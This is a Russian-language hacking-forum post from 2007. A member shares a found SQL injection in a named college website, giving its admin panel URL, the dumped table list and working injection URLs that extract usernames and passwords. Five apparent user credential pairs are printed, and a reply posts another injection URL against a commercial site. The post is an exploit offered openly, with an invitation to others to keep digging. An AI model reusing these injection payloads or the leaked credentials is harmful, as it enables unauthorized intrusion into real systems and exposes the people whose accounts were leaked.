30.10.2007, 01:23
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
случайно наткнулся, кому интересно капайте дальше.
http://www.lasc.edu/admin/ - админка
Таблицы:
'IMPORTprofessors',
'categories',
'classes',
'courses',
'dtproperties',
'extension_tbl',
'files',
'filetype_tbl',
'history_tbl',
'homework',
'IMPORTclasses',
'IMPORTcourses',
'media_tbl',
'OLDclasses','OLDcourses','OLDprofessors',
'professors',
'redirects',
'semesters',
'skyroot',
'subjects',
'sysconstraints',
'syssegments',
'user_rights',
'user_rights_pages',
'users',
'wysiwyg_tbl',
'comd_list',
'D99_Tmp',
'faculty_documents',
'faculty_info',
'faculty_links',
'jiaozhu',
'kill_kk',
'My_Cmd_Tmp2876418714116'
-----
Выводил из users:
Код:
http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)--
chilinma:btsariel*12
larsonl:miriam*12
gallagherm:maryg*12
MageeCL:business*15
medinamr:torres*12
Код:
http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users++where+username+not+in('chilinma','larsonl','gallagherm','MageeCL'))--
----
Дальше капать лень... ^^
Iceangel_
Странную инъекцию сегодня нашел...
http://www.superseeds.com/products.php?cat=27'+union+select+1,2/*
Что в таких случаях надо делать?
А с чего ты взял, что она там вообще есть?
|
|
|